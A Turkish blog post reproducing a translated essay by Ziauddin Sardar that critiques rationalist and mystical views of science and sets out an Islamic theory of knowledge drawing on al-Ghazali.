Pazartesi, Haziran 24, 2024

BİLİM ve MÜSLÜMAN, AŞIRILIKLAR ve ORTA YOL

 

BİLİM ve MÜSLÜMAN, AŞIRILIKLAR ve ORTA YOL*

 Ziyaüddin Serdar**

Çağımızda bilim adamları, toplumda ayrıcalıklı bir pozisyona sahip olmaktan hoşlanıyorlar. Bu imtiyazın bir bedeli de, bilimsel olan ve olmayan konular arasındaki karşıtlığın sürdürülmesi olmuştur. Snow (1) ve Bronowski(2)  cesur denemeleriyle bu ayrımın üstesinden geldiler; dikkatimizi bilimsel ve sanatsal üreticilik arasındaki estetik benzerliğe çekerek müspet ilimlerle beşeri bilimleri birbirine yaklaştırdılar. Bununla beraber, her şeye rağmen, bir ayrılık varsa bunun arası özellikle açılmış kabul edilmelidir. Bazı bilim adamlarına göre böyle olmasının faydası vardır. Sadece cömertçe desteklendikleri için değil, fakat nispeten soyutlanmış bir muhitte, çözülmemiş toplumsal sorunlardan ve engellerden uzakta, çalışmaları gelişme şansına sahip olduğu için bu böyledir. Dış dünyanın baskılarından korunmuş olmasıyla, zamanımızda, eşsiz bir biçimde, tabii bilimler ve branşlarının kapasite ve yeteneği artmış, incelik ve derinliği gelişmiştir.

Bununla beraber günümüzde bilim öyle önemli, güçlü ve pahalı bir hale gelmiştir ki artık soyut bir biçimde ele alınmasını imkânsız bir hale kılmaktadır. Bilimin bu mutlak başarısı onu politikaya sokmuştur; önemli siyasi kararlar halkın genel eleştirisine gittikçe daha fazla konu olmaktadır ve “bilim poltikası” da artık açıkta ve açıkça tartışılmalıdır.(3)

Bütün bunlar, bilimin doğasının bütünlüğü ve önemliliğiyle anlaşılmasını sağlıyor. Fakat şu soruya cevap bulunmalıdır: Bilim, diğer insani faaliyetlerden nasıl ayrılabilecektir?

Bilim, gerçekte, insan faaliyetlerinin belirli bir grubu olarak düşünülmelidir. Evet, bu tanımlamaya birçok kimse katılmayabilecektir. Bazılarına göre bilim sadece bir yöntemdir; ispat edilebilir gerçeklerin tespitine yarayan nesnel yöntemlerdir. Diğerlerine göreyse bilim, bu yöntemlerin birikerek toplanan ve ilavelerle çoğalan geniş çaplı uygulamasının sonucu olarak genel (avami) bilginin tutarlı olmasına hizmet eder. Biz, bilimi, bu üç görüşün hepsinin birleşik ve karmaşık bir toplamı olarak değerlendiriyoruz. Daha da fazlası; değer ve öneme yönelme odağıyla birleşmiş bütün yönleriyle düşünüyoruz ve bir bütün olarak kültürel, medeni bir etkinlik olarak kabul ediyoruz; bilim adamının dünya görüşüne göre biçimlenen, yönlendirilen bir etkinlik olarak.

 

Bilimsel Mantık, Bilimsel Akılcılık

 

“Nesnel gerçek” olarak kabul etme bakımından Yeni Apollonculuk(4) kuramıyla bilimin savunması, son dönemde, Wineberg tarafından yapılmıştır. Wineberg’e göre, bilimin kendi kanunlarının temel amaçlarının doğasıyla yapılan anlaşmaya nüfuz etmeye karar veren bir bilim adamı, artık doğanın bir öğrencisi olduğunu kabul etmektedir.(5)  Aslında kararın kendisi, bir değer yargısıdır. Buna rağmen, yaptığı anlaşmayla bilim adamı, doğanın bireysel ve değerden yoksun olmamayı şart koşan kanunlarını reddedemez.  Wineberg’in vardığı sonuçlar, tabii ki Yeni Apolloncu bilgi kuramının (epistemoloji) ifade sistemine göredir ve akılcı ahlak nazariyesine uygundur: buna göre bilimi değer anlayışından bağımsız ve insani faaliyetlerin asli değeri olarak tanımlamak sonunda bir inanç eylemi olmaktadır. Ayrıcalıklı bireylerin paylaştığı bu inanca dönüşmüş kanaat, bilim adamları için birleştirici ve bağlayıcı önemli özellik sağlamaktadır.

Bu kuram; bilimin, bilim adamlarının etkinliklerini yönlendiren bir dizi önemli olgunun, bilimsel buluş, keşif tekniğinin değerden bağımsız olduğudur. Bu da bilime güya bir üstünlük vermektedir. Bilimin, kendine üstünlük veren entelektüel ve ahlaki doğruluğun özel bir formu olduğu iddia edilmektedir.

Bu, Yeni Apolloncuların günümüz ahlak felsefesini sorgulamadığı anlamına gelmez, ama onların bilimi bizzat kurtarıcı olarak gördüklerini kolayca söyleyebiliriz. “Bilimin, dini bir esasa dayanan ahlakı artık yıkması, insani davranışlar için yeni ve akılcı bir temele dayanan yükümlülükler ortaya koyması, insanın ihtiyaçlarını dünyada temin edip karşılığını öte dünyaya bırakmayan ahlaki kurallar hazırlamasının zamanı gelmiştir.” (6)

Bilimin meydana getirdiği problemleri ve modern yaşantıda oluşturduğu amaç yoksunluğunu, Harvey Brooks meseleyi “Bilim Tekrar Yönetebilir mi?” adlı uzun ve mükemmel bir şekilde sergilediği yazısında şöyle sonuçlandırıyor:

“Neticede, teklif olarak, bilimin bir yere kadar şöyle bir maksadı karşılamaya başlayabileceğini öne süreceğim. (Sahip olunan şeylerde) maddi eşitlik, özellikle başarısının nüfusun önemli bir bölümünün özverisine dayandırıldığı zamanlarda, bir toplumu harekete geçirmekte asla yeterli olamaz. Ancak herkesin paylaştığı hedefler, ortaklaşa kabul edilen gayeler bir toplumun enerjisi olabilir. Zor yürütülen uzay programının 1960’larda başarılmasının altında bu vardır. Fakat buna rağmen, sonuca erişilmesi acıya dönüştü. Çünkü bu programın, sosyal eşitlik planlarıyla açık bir karşıtlığı vardı ve bunların belirlenmiş hedeflere erişmekten çok uzak olduğu anlaşılmıştı. Geçmişte, bu çeşit ortak hedeflere, ancak savaş sırasında veya milli rekabet sonucunda erişilirdi. Geleceğin meydan okuması, bütün vatandaşların övünebileceği, elde edilenlerin başkaları tarafından tüketilemeyeceği, grup ya da milli rekabete dayanmayan hedeflerin bulunmasını gerektiriyor. Bilim ve teknoloji, bu tür hedefleri sağlamada bize yardımcı olabilir.” (7)

Bilim ve teknolojinin daha iyi bir savunması bulunmakta mıdır, acaba? Tartışma, buna rağmen, göründüğü kadar karmaşık ve ayrıntılı değildir. Dört temel akılcı tahmine dayanmaktadır:

1. Müspet bilimler nesnel bilginin örneklerini ve listelerini sağlar;

2. Bilim değerden taraf değildir, bağımsızdır;

3. Ahlaki ve diğer kuralcı ‘yargılar’ ancak duyguların dışa aktarımıdırlar;

4. İnsan davranışları geçmişe dayalı olaylar tarafından tamamen kuşatılmıştır; bu yüzden bilimsel yöntemin tespit ettiği temel doğa kanunlarıyla teorik olarak etrafıyla tanımlanabilir ve önceden bilinebilirler.

Bu bilgi kuramı, bilim ile gerçeği eşitliyor ve buna rağmen sonuca önem vermeksizin ve neticede ne çıkacağını hesaba katmadan araştırma ve incelemelerin yapılmasını savunuyor. Bu tasarım Roubiczck’in işaret ettiği gibi, bilimsel bilgiyi mutlak değer haline getirmektedir. (8) Bir defa bu kuramda bir tuzak saklı olduğundan, bir Yeni Apolloncu, bilimin ötesinde şunu görmekte zorluk çekecektir: İlgi ve ilintilerin soyut çatısına nazaran daha sağlam, kesintisiz ve daha gerçek olan nedir, nerededir ve nasıl var olabilir?

Bilimdeki ‘nesnel gerçek’ fikri, tabii ki, ‘bilimsel yöntem’ tanımından çıkarılmıştır. Bilimsel yöntem, bir bilgi bütünü olarak nesnel durumların biriktirilmesinin yönlendirmesiyle insan gözlemlerini, deney ve sonuç çıkarımlarını onaylama, daha sonra da çürütme çabalarını içerir.

Bilimsel nesnelliğin günümüzde geçerli olan görüşü, incelemeye ve gözlemi direkt duyumsal deneye (dokunma, koku alma, tatma vb.) dayanıyor.(9) Bilimsel pozitivizm, gerçekte, bu tecrübe kaynaklarını bilimsel yöntem için esas saymaktadır. Buna rağmen, belirli bir anda bir insan’ın duygusal durumu gözlem ve görüş kuvveti olarak sonuca ulaşmasında, karar vermesinde belirleyici önemli bir rol oynayabilecektir. Belirli şart ve durumlarda duyular, bir bilim adamının en kuvvetli silahı olacaktır. Ondan duygularını, acıma ve paylaşma hissini bilmezlikten gelmesini istemek, kendi doğasını inkâr etmesini istemek demektir. Bu ne mümkün ne de istenir bir şeydir.

Kant’tan bu yana bilinmektedir ki her bilimsel araştırma, inceleme ve gözlem; bilimin edinimleri için geliştirilen bazı genel teorilere dayanmaktadır. Araştırma ve incelemelerin herhangi bir türü için ‘A teorisinin sınanması’ ile bu teorinin gözden geçirilmesi arasında nasıl bir bağıntı bulunduğunu gösterebilmek için B teorisini önceden kabul etmemizi gerektiriyor. Daha da fazlası, incelemelerin bir kısmı için bir teorinin tespit edilmesi, bazı biçimlerde araştırmaların ya teorinin fonksiyonu olması ya da teoriyle bağıntıda bulunmasını şart kılıyor. Böylelikle bilimsel gerçeklerin verileri ve ortaya koydukları asla tarafsız olamaz; her zaman için bir bakış açısını, bir görüşü, bir maksadı ifade etmek zorundadır.(10) Mitroff(11) “Bilimin Öznel Tarafı” adlı eserinde, bazı seçkin bilim adamları tarafından geliştirilen ay taşlarının analizi çalışmasında, buluşlarının nasıl onların başlangıç öncesi görüşlerine dayandığına dair bazı ilginç deliller toplamıştır.

Buna karşılık, bilim adamları, bilimin öznellik, bireysellik ve keyfilikten ayıklanmasının çözümsel-eleştirel bağlayıcılığı sürecini ve yöntemini tartışabileceklerdir. Seçkin hakemlerin reyine sunulan sistem, sadece değersiz, kalitesiz ve bayağı eklemelerin atılmasını garanti ediyor. Buna rağmen, insani etkinliklerin diğer alanlarında olduğu gibi bilimin de kendine has politikaları vardır. Dürüstlüğe gelince, “şekerlemesiyle” (12)  ünlü Newton’un, bilimsel doğruluğun ilk ve orijinal örneği olduğunu iddia edeceklerdir. Geleneksel ilmi çabaların yüce idealinin gerçekleşmesi, artık muhafaza edilmediğinden yok olan masumiyet hayalinde yatmaktadır.

Araştırmanın kendisi bile politik olmaya başlamıştır. Hilary ve Steven Rose(13) göstermişlerdir ki bilimsel kavram ve anlayışlar kadar araştırma için alan seçimi de, çeşitli derecelerde, politik ve ideolojik olarak etki altında kalmaktadır. (14)  Ve Jean-Jacques Solomon’un söylediği gibi “bilimin ideolojisindeki şaşırtıcı element, zihni yaratıklar tarafından hizmeti görüldüğü, sonuçların anlamlarını soruşturan entelektüel topluluğun idealine çok sıkı bağlandığı için fertlerin ve davranışlarının bozulmasıyla kendisini koruyamayacaktır.”(15) “Bilimin ideolojisindeki şaşırtıcı element” gerçekte mayanın, bozulmanın ta kendisidir: Yeni Apolloncu inanç, Solomon’un son derece ikna edici olarak gösterdiği gibi, bilimsel güç ister istemez politik gücün hizmetkârıdır ve aslında modern bilimin gayesi, gücü ele geçirmektedir.

Bilimsel gerçek diye gizlenerek yutturulmaya çalışılan politik dogmalar için örnek bulmak zor değildir. Sovyet soyaçekim (genetik) bilimcilerinin Lysenko önderliğinde Nazilerin emrinde yaptığı çalışmaları ve IQ ile zekâ arasındaki geçerli karşıtlığı küçük örnekler olarak verebiliriz. Bunları keşfedilmesi ve bertaraf edilmesi kolay olan ayrı olaylar düşünmek safça bir hayal olacaktır. Bunlar, karşı karşıya gelindiği, güçlü ve iyi kurulmuş doktrin için çalışıldığı için keşfetmesi kolay olaylardır. Fakat ortada başka doktrin yoksa hiç kimse (en azından şimdilik) öyle olduğunu düşünmüyorsa veya düşünenler de henüz bilim adamları (ya da politikacılar) tarafından kabul olunmayacak bir şey olarak sayıyorlarsa, sonuç ne olacaktır?

“Yakın zamanlarda, tabii bilimlerin başarısı bir dereceye kadar gerçek ve asli bilginin örneği olarak görünüyordu. Yolların çeşitliliğinde, bilimin elde etme uğraşıları veya bilimsel çalışmaların halka ulaşmış imajı ya da bilimsel bilgi; gerçeğinin yerine kaim edilmek üzere bir din olarak fonksiyon kazanmıştır. Veyahut tam karşıtı olmak üzere, toplumun onaylanmış dini olarak lanse edilmektedir. Daha fazla pratik bir derecede, bir kimsenin ölümünden sonra da yaşayacak olan bir kısım gerçeğe erişmek imkânındaki inanç, birçok bilim adamı tarafından özgeci ve adanmış bir çalışmaya itici bir güdü sağlamıştır. Çevre tarafından daha çok elle yapılan iş ve mesleklere yöneltmeye zorlanan okul öğretmenleri, kendi yeni görev ve sorumluluklarına açık pay veren kanaatlerinden kendiliğinden vazgeçmiş ve aklın huzurunu da çıkarmışlardır. Mademki gerçeği arama insani etkinliklerin en az ziyan verici ve en soylu olanı olarak belirlenmektedir, bilimi böyle kavramak bilim adamlarının kendilerini ve çabalarını eleştirebilmelerine yardımcı olacaktır. Ayrıca özellikle araştırmanın pahalı deneysel alanları adına gerçekleştirilen işlerde, genelin desteğini sağlayabilmek için yapılan tartışmalarda da faydalı olacaktır.” (16)

Bilimin dini üzerinde ahlaka dair bir çatı, bir yapı kurmak demek, tabii ki, ahlakın en temel durumlarını zayıflatmak demek olacaktır. Günümüzde bilimde meydana gelen krizin sebebi ve netice olarak insanoğlunun kötü hali, kesinlikle böyle gerçekleri elde etmeye uğraşmanın, bunların peşinde koşmanın bir sonucudur. Akılcı felsefenin pratik olduğu kadar teorik olmamasında saklıdır. Şimdiye kadar olduğu kadar gerekircilik (determinizm) kuramını kabul eden bir kimse ‘değeri inkar eden bir bilim’ ve ahlaki kaygıları yok sayma durumu için teorik bir haklı çıkarma, mazur gösterme düşüncesi bina edebilir.

“Determinist teorinin esas problemi, her şeye rağmen potansiyelinin yerinde kullanılmamış olması ve hatta içsel tutarsızlığı değildir. Daha çok, ahlakın en temel ilgi ve bağlantılarındaki (bilhassa şahsi karar verme, seçme yapmadaki) bakışının kısırlığıdır. Bir kimse bir seçme yapıp karar verdiğinde, determinist (en azından teorik olarak) o kimseye o kararı vermeye götüren, yaptığı seçmeye sebep olan faktörlerin tanımını bulup verecektir. Yine, bunun gibi, determinist (yine teorik olarak) başka bir şahsın belirli ve kendine özgü bir kararına neyin ve nasıl sebebiyet verdiğini, bize anlatıp bildirebileceğini iddia edebilecektir. Lakin determinist doğru ve haklı bir karara nasıl gidileceği veya doğru bir kararın nasıl belirlenebileceği hakkında hiçbir şey söyleyemeyecektir. Ve eğer modern bilim ve teknoloji bir şey yapmazsa, onlar verilmesi şart olan zor kararların gittikçe artan sayısını iyice fazlalaştırmışlardır…”(17)

Açıkçası, ahlakın pozitivist, rasyonalist izahı kendi kendini aldatmaktır; buna rağmen mantıklı bir bakışla (entelektüel saygınlığın geçmiş örneği olarak) kurumlaşmış Hıristiyanlık üzerinde bir hamlesi olduğu görülebilir. Savunmak demek, akademik bilgi kuramına (epistemolojiye) sokmak demekten çok (kumar olarak) ortaya koymak demek olur. Bu akılcı Batı (oksidental) medeniyetini bütün düşmanlarına karşı savunmaktan başka bir şey değildir. Ne yazık ki kurumlaşmış Hıristiyanlıkla bilimsel akılcılık arasındaki bu karşıtlık, bilim ve dinin savaşı diye tanınmıştır. Bilimin bu muvakkat başarısı dinin yıkılışından kotarılmıştır. Buna rağmen kurumlaşmış Hıristiyanlık, dinin tek temsilcisi değildir; gerçekte hatta Hıristiyanlığı bile temsil etmemektedir. İnancın öğrenmeye teşvik eden daha aydın bakış açıları vardır ki bunlarda modern bilimin asla yarışamayacağı gelenekler mevcuttur. Ve ayrıca bilimi kendi halinde tek başına çarpışan gerçek tehlike olarak kabul eden bazı dünya görüşleri de vardır.

(Occident, aslında eski Yunan ve Roma medeniyetlerinden direkt olarak etkilenen ve mekân olarak daha çok Avrupa ve Amerika’yı ifade eden bir kavram olarak karşımıza çıkmaktadır. Orient (Doğu) kavramının bir nevi karşıtıdır. Yahudi-Hıristiyan geleneğinin Yunan-Roma mirasıyla birleşiminden meydana gelen medeniyet ve kültürü kastetiği söylenebilir. Bu manada, orijinlerinin bir olması hasebiyle kapitalist ve kominist ideolojiler, bu kavram etrafında ayniyet taşımaktadır. Ziyaüddin Serdar, bir kısmını çevirmiş olduğumuz bu kitabın 16–17. sayfalarında kelimeye şöyle açıklık getirmektedir: “İşte bu kültürel kaynaktır ki, Marksist ve Kapitalist ekonomik teorilerini, parlamenter ve meclise dayalı yönetim biçimini ve Sovyetlerdeki idare tarzını ortaya çıkarmış ve, üretmiş ve geliştirmiştir. Aynı kaynak bu fikirleri geçmişte ihraç etmiş ve bu ihraç hâlâ devam etmektedir. Böylece, Oksident Avrupa ve ‘dış takipçileri’ ile sınırlı kalmayıp bütün dünyada kendi görüş, yaşayış tarzı ve yönetim biçimlerinin uygulayıcılarını, devam ettiricilerini de bulmuştur. Asya’da veya Avrupa’da, her nerede olursa olsun bu kaynağa ait olan her şey Oksidentaldir. Doğuda olup da Batıya, yani Oksident’e benzemeye çalışan, özenenler ya onların istediği gibi olmuş ya da olma sürecine girmiş demektir. Kavram, Avrupa ve yaşam tarzını kapsamaktadır, nerede olursa olsun.”)

 

Bilimsel Mistiklik

 

Çağımızda, Yeni Apolloncuların durumu, geleneksel bilimsel ahlakın pozitivizm ve akılcılık taraftarları, insanlığı kötü bir gidişe sürüklemekten dolayı ağır bir ithamla karşı karşıya gelmiştir. Çevre kirliliğinin güncel sorunları, insan ve insan, insan ve doğa arasındaki yabancılaşma, bilimin kendisinde bile ideoloji buhranı, geleneksel rasyonalist ahlakı suçlu kılmaktadır. Bu saldırıların öncülüğünü Yeni Diyonizosçular (veya Bilimsel Mistikler) üstlenmektedir.

Yeni Diyonizosçuların hareket noktası, çağdaş toplumlarda bilimsel akılcılığın şahsiyetsizleştirme/robotlaştırmadaki asli etkisi olmaktadır. ‘İnsan davranışları ve tavırları hakkında yeni ve akılcı bir esas’ kurmakta bu yüzden bir sorun yoktur. Yeni Diyonizosçulara göre, yüksek ferdi ahlaki görünüş üretecek ve çevrebilimci politikayı meşru kılacak yeni bir ahlak sistemi bilimsel rasyonalizmin yerini alacaktır. Everett Mendelson’un sorguladığı gibi:

“Yeni bir öğrenme yolu, bilgilenme tarzı meydana getirebilir miyiz; ileri teknoloji kültüründe oldukça büyük yer tutan ve bütün insani bilimler hakkında ortaya çıkan karışık buhranlarla ahlaka bağlantı kurabilen ve bilim tarafından vücuda getirilmiş sorunlara çözüm getiren yeni bir epistemoloji? Bu bilgilenme tarzı, ne tür bir biçim ve duruma sahip olacaktır? Benim hemen muhakkak olmasını gerektiğini savunduğum şey şudur: Bilme ve davranma yolu olarak bilim, ta en dip köklerine kadar reform istemektedir.

Alamet ve işaretler her yanımızda ve yöremizdedirler; bütün yapmamız gereken ‘kazı yapmayı’ taklit etmek ve bunu yaparken bir çeşit körlük veren muvakkat bir fırtınayı geçiştirmektir. Bunun için bilimle savaşımlara göz atmak gerekecektir. Bilimin, laik otorite ile kurduğu işbirliğinin yok edici ve trajik sonucu, tarafsız olma iddiasıyla maskelenen otoriteye uysal bir köle gibi hizmet etmek olmuştur. Tabii ve sosyal olmak üzere bilimin her iki yönü de, savaş çıkarıcı, vahşi ve zalim bir sistemin ayrılmaz parçası haline gelmiştir. Tekrarlamak gerekirse, tabii ve sosyal bilimler kendi bilgilenme yollarının tarafsız olduğunu iddia ederler, iyi ve kötü yerlerde de kullanılabileceğini söylerler; fakat kendisi eleştirmeye ve kınamaya tabi tutmaksızın gelişmesinin aksine vahşet icra etmektedir. Şiddet ve zorbalığa karşı herhangi bir sınırlaması olmamak, aslında gerçekte, bilgi ve tekniğin bizzat vahşet tarafından satın alınmış olduğu demek olur. İhmalcilikle şiddetin seçimi, bunun bilinçli olarak yapılmasından daha az yıkıcı değildir; tabii ki bu kaidesiyle doldurulmuş olan bombayı ateşleyip fırlatmak sonucunu doğurmaktadır.” (18)

Ravetz mistisizmi savunurken meseleyi daha da açmaktadır: “Ah, mistisizme geldik en sonunda. Gayet güzel fakat bu, bilimin yeni bir yol ve yönteme konulmasıyla ilgili ne yapmak durumundadır? Emin olarak söyleyebiliriz ki, bunun için kurumsal ve politik bir çarpışma gerekecektir; lakin meselenin bazı dağınık hayalcileri ise oldukça uzak ve ilgisiz kalacaktır. Buradan başlamanın tek sebebi, bir kimsenin başlayabileceği tek yerinin burası olmasından ötürüdür. Aynı zamanda, bu başlama yeriyle birlikte, sosyal uyanış ruhi bilinçle bitişmiştir; değişim, radikal reformcu tarafından karar verilip emredilen bazı yollarda zorlanan halkın ideallerinin alay edilen soytarılardan birisi haline gelmekten daha az ihtimal dahilindedir. Tekrar hatırlatayım ki hiçbir laik güç gruplaşmasında veya nükleer imhaya doğru gitmeden geri çekilmenin saikinde; bu karar verilmesi, seçme yapılması zor konuda onlar işin türünde değil sadece derecesinde ayrılırlar. ‘Problem’in yeni kavrayış ve anlayışının ihtiyacımız olup olmadığını görmenin zamanı gelmiştir diye düşünüyorum.” (19)

Kısaca, bilimin tahakkümü, değeri inkâr eden bilim birikimini tesirli bir şekilde reddeden aşkın bir idrak tarzı ve üslubuyla yer değiştirmelidir.

Herhalde, Yeni Diyonizosçu tarzın en çok bilinen çağdaş örnekleri Roszak(20) ve Reich’in(21) çalışmalarıdır. Mesela Roszak, modern bilimi dehşet verici bir biçimde göstermektedir:

“Benim kader çehresi giyen diye tanımladığım yaratığın, ana hatları ruhi üzüntüyle bulanmış, soğuğa maruz kalmış çıplak yüzünde, bilim adamları manevi güç, hayatiyet ve neşe adına hiçbir şey göremeyeceklerdir. Onlar yüce umutları ve baş döndüren cazibeyi unutmuşlardır. O yeni üstün olguları, meleki güzellikleri ve yüce yaratıkları keşfetmeyi tasarlayarak, ateşli bir haz ve zevkle buluşların macerasını yüklenmiştir. Ancak bütün çalışmaları sona erdiğinde, arkasına dönüp tüm yaptıklarına bakmış ve görmüştür ki dehşete düşürücü bir karakter ortaya çıkmıştır.” (22)

Rosszak, bilimsel bilginin yerini meşru ve mantıki olarak alacak bilgiyi tarife devam ediyor ve Paul Tillich’in bilgiyi (irfan) “karı koca arasındaki ilişki kadar içsel olan … katılımcı bilgi” tanımıyla eşitliyor. Bu bilgi analitik (tahlilci) ve sentezci (birleştirici) araştırmanın sonucu olan bilgi değildir; bilimsel bilginin tam tersine mevcudiyeti olan, birleşmenin ve kurtarmanın bilgisidir.

Bilime yapılan benzer eleştiriler ve mistisizmin yankıları İllich(23),Nasr(24), Davenport(25), Goodman(26) ve Teilhard de Chardin’in(27) çalışmalarından daha genişçe öğrenilebilir. Bu bilim adamları şahsi ahlakı savunmuşlardır, hedef olarak koydukları ise kurtuluşa, arınmaya erişmektir. Bununla birlikte, şahsi ve mizacın savunulmasıyla bu ahlak nazariyesinin hayatın yükünden kaçıp kurtulma olarak görülebilmesi ihtimali yüzünden bir tehlike de mevcuttur.

“Kurtuluş” yeterli değildir, ayrıca hayatı da zenginleştirmeye ihtiyacımız vardır. Pratik ahlak, her günlük etkinliklere, en yüksek derecede ruhi ve fiziki değerlere sahip somut bir şekil vermek zorundadır. İdeal realiteye çevrilmelidir, cennetsi bir ülkede geleceğe ait bir hayal olarak düşünülmemelidir.

Bilimin Batı medeniyetini (oksidental uygarlık biçimini)  geçmişin eski problemlerine döndürmesi şaşırtıcı değildir. Bilim, bugün artık bildiğimiz gibi, Batı medeniyetinin bir ürünüdür; Batı kültürü ve değerlerinin bütünü, biçimi ve sonucudur. (28) Modern bilimin kökleri tam olarak yalnız sanayi devriminde değildir. Aydınlanma çağını da hesaba katmak gerekir. Filozofları dinleyelim, aydınlanmayı anlayan ve geliştiren entelektüelleri. Bilimin tahmin ve ima ettiklerinin temelinde neler vardı? Bilim, ne yapmaya çalışıyordu? Beşer imparatorluğunun sınırlarını mı genişletmeyi deniyordu veya insana doğa üzerinde hükmetmesini sağlayacak her şeyi yapabilmeyi mümkün mü kılmaya çalışıyordu; ya da insanlığın menfaati için doğayı zorla itaat ettirmeye mi gayret ediyordu? Artık, bilim ve bilgi ahlakının beraber düşünülmesi manasız ve tutarsız olarak görülmektedir. (29)

Lynn White, modern bilimin bu tavrının Ortaçağ Hıristiyanlığından alınmış olduğunu belirtiyor. (30) Rasyonalist bilim, Hıristiyanlığın dünya görüşü üzerinde kurulmuştur. Böylelikle, yeni bir dünya görüşü ortaya koyup takdim için bu temel tanıları değiştirirseniz, bambaşka bir bilime sahip olursunuz. Bir araştırma merkezindeki araştırmacıları Taoist rahiplerle yer değiştirirseniz olacak çarpıcı değişikleri bir düşünün. Eğer (modern) bilim İslam’ın etkisiyle olgunlaşırsa tamamıyla başka bir varlık kazanır.

İlim kültürel ve medeni bir fenomendir. Her kültürün, her medeniyetin bilinçli veya bilinçsiz, güvenle tanımladığı ya da tutarsız kaldığı, tabiat olarak dünyayı, toplumu ve bilgilenmeyi ifade eden bir görüşü vardır. Bütün kültür ve uygarlıklar insanın temel meselelerini irdeler ve bir dereceye kadar mantıki olarak delillendirir; böylece kendilerine ait bilime sahip olurlar. Oksidental uygarlığın bilimlerin en akılcı olanlarını veya akılcı yönlerini içerdiği söylenebilir. Fakat diğer kültürler de medeniyetlerinin doruk noktasında kendi bilimlerine sahiptiler.

Modern bilim; insan, doğa, evren zaman ve uzay arasındaki bağıntı hakkında Oksidental uygarlığın tavırlarından oluşan kültür ve yaşam tarzının şekillendirdiği bir oluşumdur. İslam, bu konu ve problemler bambaşka tarz ve tavırlar ortaya koymuştur; bilgilenmenin müslümanca yönteminin, İslami tavırlar üzerine kurulmuş olan bilimin tamamen değişik önerileri vardır.

 

İslam ve Bilimsel Bilgi

 

İlmi tecessüs ve sistematik araştırma, İslam medeniyetinin en belirgin, önemli ve çarpıcı vasıflarından olmuştur. Bu akla uygun ama rasyonalist olmayan İslam için elbette şaşırtıcı değildir. İslam, bilim adamlığına eleştirel bir tutum geliştirmiş ve dinin geleneklerine aklın şuurunda olan yüksek bir anlayış getirmiştir. İslam, öğrenmeyi sadece teşvikle kalmamış, aynı zamanda bilgilenmenin akılcı araştırma yöntemlerinin ana çatısını da ortaya koymuştur. Böylelikle, İslam yalın olarak ‘büyük bilginler’ yetiştirmiş, ayrıca İslami dünya görüşünde bütünlediği bilimsel nesnelliği ifade eden tam bir ilim geleneği üretmiştir. (31)  İslam’ın ahlaki ve kanuni düsturlarının temelini şekillendiren ve Kur’an ayetlerinin yorumlamasını yapan Tefsir ilminin olgunlaşmasında eleştirel bakış açısı yüksek bir kavrayış sağlayan Hadis ilmi de, ayrıca, bilim adamlığı geleneği kadar büyük ve aydınca bir anlayış geliştirmiştir. İslam tarihinde, Kur’an ve Hadis, beraberce bütün bilimsel etkinliklerin temelini oluşturmuştur.  Hadis için geliştirilen eleştirel yöntem (rivayet tenkidi) ve tefsir ilminin teknikleri, tabii bilimlerin branşlarını olduğu kadar beşeri bilimleri (Humanities) de iyice etkilemiştir.

İslam’ın etkisiyle bilimin kendisi de eşsiz bir biçimde gelişmiştir. Kuzey Avrupa’daki bilim adamları, İspanya’da ve çeşitli Akdeniz ülkelerinde, harfi harfine gerçek olarak, İslam âlimlerinin dizlerinin dibine çökmüş ve ilmin ilkelerini ve 16. yy.dan sonunda, Avrupa bilim ve teknolojisi İslam’ın en iyi zamanlarına eşitlenebilmiştir.

Müslümanlar tarafından geliştirilen ilim ve bilim adamlığı geleneği gerçekten eşsizdir; lakin eşsizliği yönteminde olduğu kadar, ayrıca, bilgi kuramında (epistemoloji) de saklıdır.

İslam’ın bilgi teorisi, bilgilenmenin kutsalcı anlayışını içerir. Burada bilgi ile değer arasında herhangi bir ayrım bulunmaz. Bilgilenme sosyal işlerle bağıntılıdır ve varlığımızın en önemli karakteristiği olarak kabul edilir. Uzmanlık isteyen konularda da değerden uzak bilgi kırıntıcıklarının ayrıntıları da mevcut değildir. Ayrıca şahsiyetsizleştirip robotlaştırma, yalnızlaştırma ve yabancılaştırma da yoktur.

İslam bilgi kuramında, ilim bir ağaca benzer ve çeşitli bilimler bu sağlam ağacın kendi doğasına uyarak büyüyen, yapraklara ulaşıp meyvelenen dallarıdır. Buna rağmen gerçek ağacın dalları gibi süresiz ve kayıtsız bir şekilde büyümesini devam ettiremez ve buna benzer olarak bir bilim dalı da belli bir limitin ötesine geçemez. Limitinin ötesine geçmeye çalışan bilginin muayyen bir branşının bu çabası meyvesizlik demek olmaktadır. Eğer ağacın bir dalı süresiz ve kuralsız olarak büyürse bu durum bütün ağacın yok olmasıyla sonuçlanır.

Bu bilgi teorisinin en mükemmel bileşimini İlim Kitabı [İhyau Ulûmu-d-Din, Kitabu-l-İlm, cilt I, Birinci Kitap (32) ] adlı eserinde, Bağdad Nizamiye Medresesi Müderrisi Ebu Hamid Muhammed el-Gazzali (1058-1111) yapmıştır. Gazali, bilgiyi üç ana kriter üzerinde analiz etmiştir:

1. Kaynak:

(a) Mutlak Vahye Dayanan Bilgi: Peygamberlerden öğrenilir; aritmetik gibi akılla veya tıpta olduğu gibi deneyle ya da diller gibi işitmekle elde edilmez.

(b) Vahiyle Şartlı Olmayan Bilgi: Bu bilimlerin başlıca kaynakları akıl, gözlem, deney ve etkileşimdir.

2. Gereklilik Dereceleri:

(a) Şahsa Zorunlu Bilgi (farzu-l-ayn): Bir kişi için yaşayabilmek için gerekli olan mesela adab-ı muaşeret, ahlak, kanuna tabi olmak gibi bilgilerdir.

(b) Topluma Zorunlu Bilgi (farzu-l-kifaye): Toplumun yaşaması için gerekli olan mesela tıp, tarım, mühendislik gibi bilimlerdir.

3. Sosyal Fonksiyonlar:

(a) Övülen Bilgiler: Hayatın üzerine kurulduğu faaliyetlerin temel bilgileri demek olan yarayışlı ve gerekli bilgilerdir.

(b) Yerilen Bilgiler: Astroloji, sihir, savaşa ait bilgilerin bazı türleri, genetik mühendisliği, istikrah veren tedaviler, bilim aracılığıyla yapılan işkence vb. içerir.

Bu taslakta, bilim ve beşeri ilimler, hayati dayanışması bütün insan kültürünün bölünmemiş olmasından devşirilen, birbirinden uzak iki kültür olarak değil de, iki sütuna benzer bir şekilde sınıflandırılmıştır. Bu bilgilenme türü hem dinamik hem de statik bir hususiyet taşımaktadır. Bir yanda vahiyden çıkarılıp derlenen ana ve asli bilginin ölümsüzlük bilinci bulunmakta iken, öte yanda bilimin muayyen biçimlerinde kademe kademe ilerleme ve gelişme olmaktadır. Bilgilenmenin müslümanca çatısı, bütün insan bilimlerinin dayanağı olan asli tabloyu sağlayan vahye dayalı bilgi görüntüsünü asla kaybetmez.

